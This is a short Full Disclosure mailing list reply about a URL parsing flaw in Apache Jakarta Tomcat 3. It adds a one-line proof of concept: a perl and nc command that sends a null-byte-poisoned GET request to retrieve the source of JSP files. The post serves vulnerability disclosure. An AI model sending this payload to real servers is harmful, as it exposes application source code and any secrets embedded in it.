Full Disclosure mailing list archives
Re: Apache Jakarta Tomcat 3 URL parsing vulnerability
From: Jouko Pynnonen <jouko () solutions fi>
Date: Thu, 30 Jan 2003 14:50:27 +0200 (EET)
One more thing: the vulnerability also allows remote users to retrieve source of JSP files in this way: $ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080 -- Jouko Pynnonen Online Solutions Ltd Secure your Linux - jouko () solutions fi http://www.solutions.fi http://www.secmod.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Apache Jakarta Tomcat 3 URL parsing vulnerability Jouko Pynnonen (Jan 30)
- Re: Apache Jakarta Tomcat 3 URL parsing vulnerability Jouko Pynnonen (Jan 30)